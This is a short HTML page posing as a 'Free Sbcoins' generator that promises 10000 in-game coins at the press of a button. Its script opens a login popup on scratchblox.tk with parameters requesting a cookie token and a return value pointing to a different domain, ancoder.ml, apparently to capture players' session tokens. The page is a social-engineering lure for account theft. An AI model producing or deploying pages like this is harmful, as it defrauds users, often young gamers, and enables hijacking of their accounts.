<!DOCTYPE html>
<html>
  <head>
    <title>Free Sbcoins!</title>
  </head>
  <body>
    <script>/*Free sbcoins*/; var generate = ()=>{var login = window.open("https://scratchblox.tk/login?auth=1029312&cookie=token&done=close$return=ancoder.ml", width=100, height=100); login.onload = ()=>{if(login.location.href == "https://scratchblox.tk/home"){login.close()}}; login.onhashchange = ()=> {if(login.location.href == "https://scratchblox.tk/home"){login.close()}}}</script>
    <button onclick="generate()">Generate Sbcoins(10000 sbcoins)</button>
  </body>
</html>
